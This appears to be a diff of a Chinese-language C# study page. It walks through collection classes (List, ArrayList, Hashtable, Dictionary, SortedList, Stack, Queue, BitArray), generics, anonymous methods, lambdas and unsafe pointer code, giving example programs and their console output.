                                                        using static System.Console;
                                                        using System.Collections.Generic;
                                                        namespace HelloWorldApplication
                                                        {
                                                        class HelloWorld
                                                        {
                                                        static void Main(string[] args)
                                                        {
                                                        var a = new List<int>();
                                                        a.Add(2);
                                                        a.Add(6);
                                                        a.Add(2);
                                                        a.Add(10);
                                                        Console.WriteLine($"第一个数为{a[0]}");
                                                        a.Remove(2);//删去第一个匹配此条件的项
                                                        a.Sort();
                                                        foreach (var a2 in a)
                                                        {
                                                        WriteLine(a2);
                                                        }
                                                        bool a3 = a.Contains(2);
                                                        WriteLine(a3);
                                                        Console.ReadKey();
                                                        }
                                                        }
                                                        }
                                                        +
                                                        1
                                                        2
                                                        3
                                                        4
                                                        5
                                                        第一个数为2
                                                        2
                                                        6
                                                        10
                                                        True

                                                        动态数组(ArrayList)

                                                        • C# 动态数组(ArrayList) | 菜鸟教程 (runoob.com)
                                                        • @@ -1585,16 +1583,16 @@

                                                          ​ 基于以上区别,推荐在大多数情况下优先选择 List<T>,因为它提供了类型安全、性能更好以及更好的扩展性。只有在需要与遗留代码或者需要存储不同类型对象的情况下,才考虑使用 ArrayList

                                                -
                                                using System;
                                                using System.Collections;

                                                namespace CollectionApplication
                                                {
                                                class Program
                                                {
                                                static void Main(string[] args)
                                                {
                                                ArrayList al = new ArrayList();

                                                Console.WriteLine("Adding some objects:");
                                                al.Add(45);
                                                al.Add("A");
                                                al.Add(33);
                                                al.Add(56);
                                                al.Add(true);
                                                al.Add(23);
                                                al.Add(9);

                                                Console.WriteLine("Capacity: {0} ", al.Capacity);
                                                Console.WriteLine("Count: {0}", al.Count);

                                                Console.Write("Content: ");
                                                foreach (var i in al)
                                                {
                                                Console.Write(i + " ");
                                                }
                                                Console.WriteLine();
                                                Console.ReadKey();
                                                }
                                                }
                                                }
                                                -
                                                Adding some objects:
                                                Capacity: 8
                                                Count: 7
                                                Content: 45 A 33 56 True 23 9
                                                +
                                                1
                                                2
                                                3
                                                4
                                                5
                                                6
                                                7
                                                8
                                                9
                                                10
                                                11
                                                12
                                                13
                                                14
                                                15
                                                16
                                                17
                                                18
                                                19
                                                20
                                                21
                                                22
                                                23
                                                24
                                                25
                                                26
                                                27
                                                28
                                                29
                                                30
                                                31
                                                32
                                                33
                                                using System;
                                                using System.Collections;

                                                namespace CollectionApplication
                                                {
                                                class Program
                                                {
                                                static void Main(string[] args)
                                                {
                                                ArrayList al = new ArrayList();

                                                Console.WriteLine("Adding some objects:");
                                                al.Add(45);
                                                al.Add("A");
                                                al.Add(33);
                                                al.Add(56);
                                                al.Add(true);
                                                al.Add(23);
                                                al.Add(9);

                                                Console.WriteLine("Capacity: {0} ", al.Capacity);
                                                Console.WriteLine("Count: {0}", al.Count);

                                                Console.Write("Content: ");
                                                foreach (var i in al)
                                                {
                                                Console.Write(i + " ");
                                                }
                                                Console.WriteLine();
                                                Console.ReadKey();
                                                }
                                                }
                                                }
                                                +
                                                1
                                                2
                                                3
                                                4
                                                Adding some objects:
                                                Capacity: 8
                                                Count: 7
                                                Content: 45 A 33 56 True 23 9

                                                哈希表(Hashtable)

                                                ​ Hashtable 类代表了一系列基于键的哈希代码组织起来的键/值对。它使用来访问集合中的元素。

                                                ​ 当您使用访问元素时,则使用哈希表,而且您可以识别一个有用的键值。哈希表中的每一项都有一个键/值对。键用于访问集合中的项目。

                                                -
                                                using System;
                                                using System.Collections;

                                                namespace CollectionsApplication
                                                {
                                                class Program
                                                {
                                                static void Main(string[] args)
                                                {
                                                Hashtable ht = new Hashtable();


                                                ht.Add("001", "Zara Ali");
                                                ht.Add("002", "Abida Rehman");
                                                ht.Add("003", "Joe Holzner");
                                                ht.Add("004", "Mausam Benazir Nur");
                                                ht.Add("005", "M. Amlan");
                                                ht.Add("006", "M. Arif");
                                                ht.Add("007", "Ritesh Saikia");

                                                if (ht.ContainsValue("Nuha Ali"))
                                                {
                                                Console.WriteLine("This student name is already in the list");
                                                }
                                                else
                                                {
                                                ht.Add("008", "Nuha Ali");
                                                }
                                                // 获取键的集合
                                                ICollection key = ht.Keys;

                                                foreach (string k in key)
                                                {
                                                Console.WriteLine(k + ": " + ht[k]);
                                                }
                                                Console.ReadKey();
                                                }
                                                }
                                                }
                                                -
                                                006: M. Arif
                                                007: Ritesh Saikia
                                                008: Nuha Ali
                                                003: Joe Holzner
                                                002: Abida Rehman
                                                004: Mausam Benazir Nur
                                                001: Zara Ali
                                                005: M. Amlan
                                                +
                                                1
                                                2
                                                3
                                                4
                                                5
                                                6
                                                7
                                                8
                                                9
                                                10
                                                11
                                                12
                                                13
                                                14
                                                15
                                                16
                                                17
                                                18
                                                19
                                                20
                                                21
                                                22
                                                23
                                                24
                                                25
                                                26
                                                27
                                                28
                                                29
                                                30
                                                31
                                                32
                                                33
                                                34
                                                35
                                                36
                                                37
                                                38
                                                39
                                                using System;
                                                using System.Collections;

                                                namespace CollectionsApplication
                                                {
                                                class Program
                                                {
                                                static void Main(string[] args)
                                                {
                                                Hashtable ht = new Hashtable();


                                                ht.Add("001", "Zara Ali");
                                                ht.Add("002", "Abida Rehman");
                                                ht.Add("003", "Joe Holzner");
                                                ht.Add("004", "Mausam Benazir Nur");
                                                ht.Add("005", "M. Amlan");
                                                ht.Add("006", "M. Arif");
                                                ht.Add("007", "Ritesh Saikia");

                                                if (ht.ContainsValue("Nuha Ali"))
                                                {
                                                Console.WriteLine("This student name is already in the list");
                                                }
                                                else
                                                {
                                                ht.Add("008", "Nuha Ali");
                                                }
                                                // 获取键的集合
                                                ICollection key = ht.Keys;

                                                foreach (string k in key)
                                                {
                                                Console.WriteLine(k + ": " + ht[k]);
                                                }
                                                Console.ReadKey();
                                                }
                                                }
                                                }
                                                +
                                                1
                                                2
                                                3
                                                4
                                                5
                                                6
                                                7
                                                8
                                                006: M. Arif
                                                007: Ritesh Saikia
                                                008: Nuha Ali
                                                003: Joe Holzner
                                                002: Abida Rehman
                                                004: Mausam Benazir Nur
                                                001: Zara Ali
                                                005: M. Amlan

                                                字典

                                                ​ 在 C# 中,哈希表(HashTable)和字典(Dictionary)是两种不同的数据结构,它们具有以下区别:

                                                @@ -1619,36 +1617,36 @@

                                                字典

                                    ​ 综上所述,尽管哈希表和字典在功能上有所重叠(即存储键值对的能力),但字典在C#中通常是更好的选择,特别是在需要类型安全、更好性能和更清晰的编码方面。

                                -
                                using System;
                                using System.Collections.Generic;
                                namespace HelloWorldApplication
                                {
                                class A
                                {
                                static void Main(string[] args)
                                {
                                var a = new Dictionary<int, int>();
                                a.Add(12, 14);
                                a.Add(0, 1);
                                Console.WriteLine("删去前的Count" + a.Count);
                                a.Remove(0);
                                Console.WriteLine(a[12]);
                                Console.WriteLine(a.Count);
                                Console.WriteLine(a.ContainsKey(12));
                                Console.ReadKey();
                                }
                                }
                                }
                                -
                                删去前的Count2
                                14
                                1
                                True
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                19
                                20
                                using System;
                                using System.Collections.Generic;
                                namespace HelloWorldApplication
                                {
                                class A
                                {
                                static void Main(string[] args)
                                {
                                var a = new Dictionary<int, int>();
                                a.Add(12, 14);
                                a.Add(0, 1);
                                Console.WriteLine("删去前的Count" + a.Count);
                                a.Remove(0);
                                Console.WriteLine(a[12]);
                                Console.WriteLine(a.Count);
                                Console.WriteLine(a.ContainsKey(12));
                                Console.ReadKey();
                                }
                                }
                                }
                                +
                                1
                                2
                                3
                                4
                                删去前的Count2
                                14
                                1
                                True

                                排序列表(SortedList)

                                ​ SortedList 类代表了一系列按照键来排序的键/值对,这些键值对可以通过键和索引来访问。

                                ​ 排序列表是数组和哈希表的组合。它包含一个可使用键或索引访问各项的列表。如果您使用索引访问各项,则它是一个动态数组(ArrayList),如果您使用键访问各项,则它是一个哈希表(Hashtable)。集合中的各项总是按键值排序。

                                -
                                using System;
                                using System.Collections;

                                namespace CollectionsApplication
                                {
                                class Program
                                {
                                static void Main(string[] args)
                                {
                                SortedList sl = new SortedList();

                                sl.Add("003", "Joe Holzner");
                                sl.Add("001", "Zara Ali");
                                sl.Add("004", "Mausam Benazir Nur");
                                sl.Add("002", "Abida Rehman");
                                sl.Add("107", "Ritesh Saikia");
                                sl.Add("006", "M. Arif");
                                sl.Add("00A", "M. Amlan");

                                if (sl.ContainsValue("Nuha Ali"))
                                {
                                Console.WriteLine("This student name is already in the list");
                                }
                                else
                                {
                                sl.Add("008", "Nuha Ali");
                                }

                                // 获取键的集合
                                ICollection key = sl.Keys;

                                foreach (string k in key)
                                {
                                Console.WriteLine(k + ": " + sl[k]);
                                }
                                }
                                }
                                }
                                -
                                001: Zara Ali
                                002: Abida Rehman
                                003: Joe Holzner
                                004: Mausam Benazir Nur
                                006: M. Arif
                                008: Nuha Ali
                                00A: M. Amlan
                                107: Ritesh Saikia
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                19
                                20
                                21
                                22
                                23
                                24
                                25
                                26
                                27
                                28
                                29
                                30
                                31
                                32
                                33
                                34
                                35
                                36
                                37
                                38
                                using System;
                                using System.Collections;

                                namespace CollectionsApplication
                                {
                                class Program
                                {
                                static void Main(string[] args)
                                {
                                SortedList sl = new SortedList();

                                sl.Add("003", "Joe Holzner");
                                sl.Add("001", "Zara Ali");
                                sl.Add("004", "Mausam Benazir Nur");
                                sl.Add("002", "Abida Rehman");
                                sl.Add("107", "Ritesh Saikia");
                                sl.Add("006", "M. Arif");
                                sl.Add("00A", "M. Amlan");

                                if (sl.ContainsValue("Nuha Ali"))
                                {
                                Console.WriteLine("This student name is already in the list");
                                }
                                else
                                {
                                sl.Add("008", "Nuha Ali");
                                }

                                // 获取键的集合
                                ICollection key = sl.Keys;

                                foreach (string k in key)
                                {
                                Console.WriteLine(k + ": " + sl[k]);
                                }
                                }
                                }
                                }
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                001: Zara Ali
                                002: Abida Rehman
                                003: Joe Holzner
                                004: Mausam Benazir Nur
                                006: M. Arif
                                008: Nuha Ali
                                00A: M. Amlan
                                107: Ritesh Saikia

                                堆栈(Stack)

                                堆栈(Stack)代表了一个后进先出的对象集合。当您需要对各项进行后进先出的访问时,则使用堆栈。当您在列表中添加一项,称为推入元素,当您从列表中移除一项时,称为弹出元素。

                                -
                                using System;
                                using System.Collections;

                                namespace CollectionsApplication
                                {
                                class Program
                                {
                                static void Main(string[] args)
                                {
                                Stack st = new Stack();

                                st.Push('A');
                                st.Push('M');
                                st.Push('G');
                                st.Push('W');

                                Console.WriteLine("Current stack: ");
                                foreach (char c in st)
                                {
                                Console.Write(c + " ");
                                }
                                Console.WriteLine();

                                st.Push('V');
                                st.Push('H');
                                Console.WriteLine("The next poppable value in stack: {0}",
                                st.Peek());
                                Console.WriteLine("Current stack: ");
                                foreach (char c in st)
                                {
                                Console.Write(c + " ");
                                }
                                Console.WriteLine();

                                Console.WriteLine("Removing values ");
                                st.Pop();
                                st.Pop();
                                st.Pop();

                                Console.WriteLine("Current stack: ");
                                foreach (char c in st)
                                {
                                Console.Write(c + " ");
                                }
                                }
                                }
                                }
                                -
                                Current stack:
                                W G M A
                                The next poppable value in stack: H
                                Current stack:
                                H V W G M A
                                Removing values
                                Current stack:
                                G M A
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                19
                                20
                                21
                                22
                                23
                                24
                                25
                                26
                                27
                                28
                                29
                                30
                                31
                                32
                                33
                                34
                                35
                                36
                                37
                                38
                                39
                                40
                                41
                                42
                                43
                                44
                                45
                                46
                                47
                                using System;
                                using System.Collections;

                                namespace CollectionsApplication
                                {
                                class Program
                                {
                                static void Main(string[] args)
                                {
                                Stack st = new Stack();

                                st.Push('A');
                                st.Push('M');
                                st.Push('G');
                                st.Push('W');

                                Console.WriteLine("Current stack: ");
                                foreach (char c in st)
                                {
                                Console.Write(c + " ");
                                }
                                Console.WriteLine();

                                st.Push('V');
                                st.Push('H');
                                Console.WriteLine("The next poppable value in stack: {0}",
                                st.Peek());
                                Console.WriteLine("Current stack: ");
                                foreach (char c in st)
                                {
                                Console.Write(c + " ");
                                }
                                Console.WriteLine();

                                Console.WriteLine("Removing values ");
                                st.Pop();
                                st.Pop();
                                st.Pop();

                                Console.WriteLine("Current stack: ");
                                foreach (char c in st)
                                {
                                Console.Write(c + " ");
                                }
                                }
                                }
                                }
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                Current stack:
                                W G M A
                                The next poppable value in stack: H
                                Current stack:
                                H V W G M A
                                Removing values
                                Current stack:
                                G M A

                                队列(Queue)

                                ​ **队列(Queue)代表了一个先进先出的对象集合。**当您需要对各项进行先进先出的访问时,则使用队列。当您在列表中添加一项,称为入队,当您从列表中移除一项时,称为出队。

                                -
                                using System;
                                using System.Collections;

                                namespace CollectionsApplication
                                {
                                class Program
                                {
                                static void Main(string[] args)
                                {
                                Queue q = new Queue();

                                q.Enqueue('A');
                                q.Enqueue('M');
                                q.Enqueue('G');
                                q.Enqueue('W');

                                Console.WriteLine("Current queue: ");
                                foreach (char c in q)
                                Console.Write(c + " ");
                                Console.WriteLine();
                                q.Enqueue('V');
                                q.Enqueue('H');
                                Console.WriteLine("Current queue: ");
                                foreach (char c in q)
                                Console.Write(c + " ");
                                Console.WriteLine();
                                Console.WriteLine("Removing some values ");
                                char ch = (char)q.Dequeue();
                                Console.WriteLine("The removed value: {0}", ch);
                                ch = (char)q.Dequeue();
                                Console.WriteLine("The removed value: {0}", ch);
                                Console.ReadKey();
                                }
                                }
                                }
                                -
                                Current queue:
                                A M G W
                                Current queue:
                                A M G W V H
                                Removing some values
                                The removed value: A
                                The removed value: M
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                19
                                20
                                21
                                22
                                23
                                24
                                25
                                26
                                27
                                28
                                29
                                30
                                31
                                32
                                33
                                34
                                35
                                using System;
                                using System.Collections;

                                namespace CollectionsApplication
                                {
                                class Program
                                {
                                static void Main(string[] args)
                                {
                                Queue q = new Queue();

                                q.Enqueue('A');
                                q.Enqueue('M');
                                q.Enqueue('G');
                                q.Enqueue('W');

                                Console.WriteLine("Current queue: ");
                                foreach (char c in q)
                                Console.Write(c + " ");
                                Console.WriteLine();
                                q.Enqueue('V');
                                q.Enqueue('H');
                                Console.WriteLine("Current queue: ");
                                foreach (char c in q)
                                Console.Write(c + " ");
                                Console.WriteLine();
                                Console.WriteLine("Removing some values ");
                                char ch = (char)q.Dequeue();
                                Console.WriteLine("The removed value: {0}", ch);
                                ch = (char)q.Dequeue();
                                Console.WriteLine("The removed value: {0}", ch);
                                Console.ReadKey();
                                }
                                }
                                }
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                Current queue:
                                A M G W
                                Current queue:
                                A M G W V H
                                Removing some values
                                The removed value: A
                                The removed value: M

                                点阵列(BitArray)

                                ​ BitArray 类管理一个紧凑型的位值数组,它使用布尔值来表示,其中 true 表示位是开启的(1),false 表示位是关闭的(0)。

                                ​ 当您需要存储位,但是事先不知道位数时,则使用点阵列。您可以使用整型索引从点阵列集合中访问各项,索引从零开始。

                                -
                                using System;
                                using System.Collections;

                                namespace CollectionsApplication
                                {
                                class Program
                                {
                                static void Main(string[] args)
                                {
                                // 创建两个大小为 8 的点阵列
                                BitArray ba1 = new BitArray(8);
                                BitArray ba2 = new BitArray(8);
                                byte[] a = { 60 };
                                byte[] b = { 13 };

                                // 把值 60 和 13 存储到点阵列中
                                ba1 = new BitArray(a);
                                ba2 = new BitArray(b);

                                // ba1 的内容
                                Console.WriteLine("Bit array ba1: 60");
                                for (int i = 0; i < ba1.Count; i++)
                                {
                                Console.Write("{0, -6} ", ba1[i]);
                                }
                                Console.WriteLine();

                                // ba2 的内容
                                Console.WriteLine("Bit array ba2: 13");
                                for (int i = 0; i < ba2.Count; i++)
                                {
                                Console.Write("{0, -6} ", ba2[i]);
                                }
                                Console.WriteLine();


                                BitArray ba3 = new BitArray(8);
                                ba3 = ba1.And(ba2);

                                // ba3 的内容
                                Console.WriteLine("Bit array ba3 after AND operation: 12");
                                for (int i = 0; i < ba3.Count; i++)
                                {
                                Console.Write("{0, -6} ", ba3[i]);
                                }
                                Console.WriteLine();

                                ba3 = ba1.Or(ba2);
                                // ba3 的内容
                                Console.WriteLine("Bit array ba3 after OR operation: 61");
                                for (int i = 0; i < ba3.Count; i++)
                                {
                                Console.Write("{0, -6} ", ba3[i]);
                                }
                                Console.WriteLine();

                                Console.ReadKey();
                                }
                                }
                                }
                                -
                                Bit array ba1: 60
                                False False True True True True False False
                                Bit array ba2: 13
                                True False True True False False False False
                                Bit array ba3 after AND operation: 12
                                False False True True False False False False
                                Bit array ba3 after OR operation: 61
                                True False True True False False False False
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                19
                                20
                                21
                                22
                                23
                                24
                                25
                                26
                                27
                                28
                                29
                                30
                                31
                                32
                                33
                                34
                                35
                                36
                                37
                                38
                                39
                                40
                                41
                                42
                                43
                                44
                                45
                                46
                                47
                                48
                                49
                                50
                                51
                                52
                                53
                                54
                                55
                                56
                                57
                                58
                                59
                                60
                                using System;
                                using System.Collections;

                                namespace CollectionsApplication
                                {
                                class Program
                                {
                                static void Main(string[] args)
                                {
                                // 创建两个大小为 8 的点阵列
                                BitArray ba1 = new BitArray(8);
                                BitArray ba2 = new BitArray(8);
                                byte[] a = { 60 };
                                byte[] b = { 13 };

                                // 把值 60 和 13 存储到点阵列中
                                ba1 = new BitArray(a);
                                ba2 = new BitArray(b);

                                // ba1 的内容
                                Console.WriteLine("Bit array ba1: 60");
                                for (int i = 0; i < ba1.Count; i++)
                                {
                                Console.Write("{0, -6} ", ba1[i]);
                                }
                                Console.WriteLine();

                                // ba2 的内容
                                Console.WriteLine("Bit array ba2: 13");
                                for (int i = 0; i < ba2.Count; i++)
                                {
                                Console.Write("{0, -6} ", ba2[i]);
                                }
                                Console.WriteLine();


                                BitArray ba3 = new BitArray(8);
                                ba3 = ba1.And(ba2);

                                // ba3 的内容
                                Console.WriteLine("Bit array ba3 after AND operation: 12");
                                for (int i = 0; i < ba3.Count; i++)
                                {
                                Console.Write("{0, -6} ", ba3[i]);
                                }
                                Console.WriteLine();

                                ba3 = ba1.Or(ba2);
                                // ba3 的内容
                                Console.WriteLine("Bit array ba3 after OR operation: 61");
                                for (int i = 0; i < ba3.Count; i++)
                                {
                                Console.Write("{0, -6} ", ba3[i]);
                                }
                                Console.WriteLine();

                                Console.ReadKey();
                                }
                                }
                                }
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                Bit array ba1: 60
                                False False True True True True False False
                                Bit array ba2: 13
                                True False True True False False False False
                                Bit array ba3 after AND operation: 12
                                False False True True False False False False
                                Bit array ba3 after OR operation: 61
                                True False True True False False False False

                                ​ 感觉就是把一个数的二进制形式拆成 bool 形式来表示。

                                泛型(Generic)

                                泛型(Generic) 允许您延迟编写类或方法中的编程元素的数据类型的规范,直到实际在程序中使用它的时候。换句话说,泛型允许您编写一个可以与任何数据类型一起工作的类或方法。

                                ​ 您可以通过数据类型的替代参数编写类或方法的规范。当编译器遇到类的构造函数或方法的函数调用时,它会生成代码来处理指定的数据类型。

                                ​ 您可以通过类型参数定义泛型委托。例如:

                                -
                                using System;
                                using System.Collections.Generic;

                                delegate T NumberChanger<T>(T n);
                                namespace GenericDelegateAppl
                                {
                                class TestDelegate
                                {
                                static int num = 10;
                                public static int AddNum(int p)
                                {
                                num += p;
                                return num;
                                }

                                public static int MultNum(int q)
                                {
                                num *= q;
                                return num;
                                }
                                public static int getNum()
                                {
                                return num;
                                }

                                static void Main(string[] args)
                                {
                                // 创建委托实例
                                NumberChanger<int> nc1 = new NumberChanger<int>(AddNum);
                                NumberChanger<int> nc2 = new NumberChanger<int>(MultNum);
                                // 使用委托对象调用方法
                                nc1(25);
                                Console.WriteLine("Value of Num: {0}", getNum());
                                nc2(5);
                                Console.WriteLine("Value of Num: {0}", getNum());
                                Console.ReadKey();
                                }
                                }
                                }
                                -
                                Value of Num: 35
                                Value of Num: 175
                                +
                                1
                                2
                                3
                                4
                                5
                                6
                                7
                                8
                                9
                                10
                                11
                                12
                                13
                                14
                                15
                                16
                                17
                                18
                                19
                                20
                                21
                                22
                                23
                                24
                                25
                                26
                                27
                                28
                                29
                                30
                                31
                                32
                                33
                                34
                                35
                                36
                                37
                                38
                                39
                                using System;
                                using System.Collections.Generic;

                                delegate T NumberChanger<T>(T n);
                                namespace GenericDelegateAppl
                                {
                                class TestDelegate
                                {
                                static int num = 10;
                                public static int AddNum(int p)
                                {
                                num += p;
                                return num;
                                }

                                public static int MultNum(int q)
                                {
                                num *= q;
                                return num;
                                }
                                public static int getNum()
                                {
                                return num;
                                }

                                static void Main(string[] args)
                                {
                                // 创建委托实例
                                NumberChanger<int> nc1 = new NumberChanger<int>(AddNum);
                                NumberChanger<int> nc2 = new NumberChanger<int>(MultNum);
                                // 使用委托对象调用方法
                                nc1(25);
                                Console.WriteLine("Value of Num: {0}", getNum());
                                nc2(5);
                                Console.WriteLine("Value of Num: {0}", getNum());
                                Console.ReadKey();
                                }
                                }
                                }
                                +
                                1
                                2
                                Value of Num: 35
                                Value of Num: 175

                                C# 匿名方法

                                • C# 匿名方法 | 菜鸟教程 (runoob.com)
                                • @@ -1659,28 +1657,28 @@

                                  Lambda 表达式

                                  ​ Lambda 表达式是一个简洁的语法,用于创建匿名函数。它们通常用于 LINQ 查询和委托。

                                  -
                                  (parameters) => expression
                                  // 或
                                  (parameters) => { statement; }
                                  -
                                  // 示例:使用 Lambda 表达式定义一个委托
                                  Func<int, int, int> add = (a, b) => a + b;
                                  Console.WriteLine(add(2, 3)); // 输出 5

                                  // 示例:使用 Lambda 表达式过滤数组中的元素
                                  int[] numbers = { 1, 2, 3, 4, 5 };
                                  var evenNumbers = numbers.Where(n => n % 2 == 0);
                                  foreach (var num in evenNumbers)
                                  {
                                  Console.WriteLine(num); // 输出 2 4
                                  }
                                  +
                                  1
                                  2
                                  3
                                  (parameters) => expression
                                  // 或
                                  (parameters) => { statement; }
                                  +
                                  1
                                  2
                                  3
                                  4
                                  5
                                  6
                                  7
                                  8
                                  9
                                  10
                                  11
                                  // 示例:使用 Lambda 表达式定义一个委托
                                  Func<int, int, int> add = (a, b) => a + b;
                                  Console.WriteLine(add(2, 3)); // 输出 5

                                  // 示例:使用 Lambda 表达式过滤数组中的元素
                                  int[] numbers = { 1, 2, 3, 4, 5 };
                                  var evenNumbers = numbers.Where(n => n % 2 == 0);
                                  foreach (var num in evenNumbers)
                                  {
                                  Console.WriteLine(num); // 输出 2 4
                                  }

                                  匿名方法

                                  ​ 匿名方法是通过使用 delegate 关键字创建委托实例来声明的。

                                  -
                                  using System;

                                  delegate void NumberChanger(int n);
                                  namespace DelegateAppl
                                  {
                                  class TestDelegate
                                  {
                                  static int num = 10;
                                  public static void AddNum(int p)
                                  {
                                  num += p;
                                  Console.WriteLine("Named Method: {0}", num);
                                  }

                                  public static void MultNum(int q)
                                  {
                                  num *= q;
                                  Console.WriteLine("Named Method: {0}", num);
                                  }

                                  static void Main(string[] args)
                                  {
                                  // 使用匿名方法创建委托实例
                                  NumberChanger nc = delegate(int x)
                                  {
                                  Console.WriteLine("Anonymous Method: {0}", x);
                                  };

                                  // 使用匿名方法调用委托
                                  nc(10);

                                  // 使用命名方法实例化委托
                                  nc = new NumberChanger(AddNum);

                                  // 使用命名方法调用委托
                                  nc(5);

                                  // 使用另一个命名方法实例化委托
                                  nc = new NumberChanger(MultNum);

                                  // 使用命名方法调用委托
                                  nc(2);
                                  Console.ReadKey();
                                  }
                                  }
                                  }
                                  +
                                  1
                                  2
                                  3
                                  4
                                  5
                                  6
                                  7
                                  8
                                  9
                                  10
                                  11
                                  12
                                  13
                                  14
                                  15
                                  16
                                  17
                                  18
                                  19
                                  20
                                  21
                                  22
                                  23
                                  24
                                  25
                                  26
                                  27
                                  28
                                  29
                                  30
                                  31
                                  32
                                  33
                                  34
                                  35
                                  36
                                  37
                                  38
                                  39
                                  40
                                  41
                                  42
                                  43
                                  44
                                  45
                                  46
                                  using System;

                                  delegate void NumberChanger(int n);
                                  namespace DelegateAppl
                                  {
                                  class TestDelegate
                                  {
                                  static int num = 10;
                                  public static void AddNum(int p)
                                  {
                                  num += p;
                                  Console.WriteLine("Named Method: {0}", num);
                                  }

                                  public static void MultNum(int q)
                                  {
                                  num *= q;
                                  Console.WriteLine("Named Method: {0}", num);
                                  }

                                  static void Main(string[] args)
                                  {
                                  // 使用匿名方法创建委托实例
                                  NumberChanger nc = delegate(int x)
                                  {
                                  Console.WriteLine("Anonymous Method: {0}", x);
                                  };

                                  // 使用匿名方法调用委托
                                  nc(10);

                                  // 使用命名方法实例化委托
                                  nc = new NumberChanger(AddNum);

                                  // 使用命名方法调用委托
                                  nc(5);

                                  // 使用另一个命名方法实例化委托
                                  nc = new NumberChanger(MultNum);

                                  // 使用命名方法调用委托
                                  nc(2);
                                  Console.ReadKey();
                                  }
                                  }
                                  }

                                  ​ 在 C# 2.0 及更高版本中,引入了 lambda 表达式,它是一种更简洁的语法形式,用于编写匿名方法。

                                  ​ 使用 lambda 表达式:

                                  -
                                  using System;

                                  delegate void NumberChanger(int n);

                                  namespace DelegateAppl
                                  {
                                  class TestDelegate
                                  {
                                  static int num = 10;

                                  public static void AddNum(int p)
                                  {
                                  num += p;
                                  Console.WriteLine("Named Method: {0}", num);
                                  }

                                  public static void MultNum(int q)
                                  {
                                  num *= q;
                                  Console.WriteLine("Named Method: {0}", num);
                                  }

                                  static void Main(string[] args)
                                  {
                                  // 使用 lambda 表达式创建委托实例
                                  NumberChanger nc = x => Console.WriteLine($"Lambda Expression: {x}");

                                  // 使用 lambda 表达式调用委托
                                  nc(10);

                                  // 使用命名方法实例化委托
                                  nc = new NumberChanger(AddNum);

                                  // 使用命名方法调用委托
                                  nc(5);

                                  // 使用另一个命名方法实例化委托
                                  nc = new NumberChanger(MultNum);

                                  // 使用命名方法调用委托
                                  nc(2);

                                  Console.ReadKey();
                                  }
                                  }
                                  }
                                  -
                                  Lambda Expression: 10
                                  Named Method: 15
                                  Named Method: 30
                                  +
                                  1
                                  2
                                  3
                                  4
                                  5
                                  6
                                  7
                                  8
                                  9
                                  10
                                  11
                                  12
                                  13
                                  14
                                  15
                                  16
                                  17
                                  18
                                  19
                                  20
                                  21
                                  22
                                  23
                                  24
                                  25
                                  26
                                  27
                                  28
                                  29
                                  30
                                  31
                                  32
                                  33
                                  34
                                  35
                                  36
                                  37
                                  38
                                  39
                                  40
                                  41
                                  42
                                  43
                                  44
                                  45
                                  46
                                  using System;

                                  delegate void NumberChanger(int n);

                                  namespace DelegateAppl
                                  {
                                  class TestDelegate
                                  {
                                  static int num = 10;

                                  public static void AddNum(int p)
                                  {
                                  num += p;
                                  Console.WriteLine("Named Method: {0}", num);
                                  }

                                  public static void MultNum(int q)
                                  {
                                  num *= q;
                                  Console.WriteLine("Named Method: {0}", num);
                                  }

                                  static void Main(string[] args)
                                  {
                                  // 使用 lambda 表达式创建委托实例
                                  NumberChanger nc = x => Console.WriteLine($"Lambda Expression: {x}");

                                  // 使用 lambda 表达式调用委托
                                  nc(10);

                                  // 使用命名方法实例化委托
                                  nc = new NumberChanger(AddNum);

                                  // 使用命名方法调用委托
                                  nc(5);

                                  // 使用另一个命名方法实例化委托
                                  nc = new NumberChanger(MultNum);

                                  // 使用命名方法调用委托
                                  nc(2);

                                  Console.ReadKey();
                                  }
                                  }
                                  }
                                  +
                                  1
                                  2
                                  3
                                  Lambda Expression: 10
                                  Named Method: 15
                                  Named Method: 30

                                  C# 不安全代码

                                  ​ 当一个代码块使用 unsafe 修饰符标记时,C# 允许在函数中使用指针变量。不安全代码或非托管代码是指使用了指针变量的代码块。

                                  ​ 就跟 C/C++ 差不多了……

                                  -
                                  using System;
                                  namespace UnsafeCodeApplication
                                  {
                                  class Program
                                  {
                                  static unsafe void Main(string[] args)
                                  {
                                  int var = 20;
                                  int* p = &var;
                                  Console.WriteLine("Data is: {0} ", var);
                                  Console.WriteLine("Address is: {0}", (int)p);
                                  Console.ReadKey();
                                  }
                                  }
                                  }
                                  +
                                  1
                                  2
                                  3
                                  4
                                  5
                                  6
                                  7
                                  8
                                  9
                                  10
                                  11
                                  12
                                  13
                                  14
                                  15
                                  using System;
                                  namespace UnsafeCodeApplication
                                  {
                                  class Program
                                  {
                                  static unsafe void Main(string[] args)
                                  {
                                  int var = 20;
                                  int* p = &var;
                                  Console.WriteLine("Data is: {0} ", var);
                                  Console.WriteLine("Address is: {0}", (int)p);
                                  Console.ReadKey();
                                  }
                                  }
                                  }

                                  C# 多线程

                                  线程 被定义为程序的执行路径。每个线程都定义了一个独特的控制流。如果您的应用程序涉及到复杂的和耗时的操作,那么设置不同的线程执行路径往往是有益的,每个线程执行特定的工作。

                                  ​ 线程是轻量级进程。一个使用线程的常见实例是现代操作系统中并行编程的实现。使用线程节省了 CPU 周期的浪费,同时提高了应用程序的效率。

                                  ​ 到目前为止我们编写的程序是一个单线程作为应用程序的运行实例的单一的过程运行的。但是,这样子应用程序同时只能执行一个任务。为了同时执行多个任务,它可以被划分为更小的线程。

                                  -
                                  using System;
                                  using System.Threading;

                                  namespace MultithreadingApplication
                                  {
                                  class ThreadCreationProgram
                                  {
                                  public static void CallToChildThread()
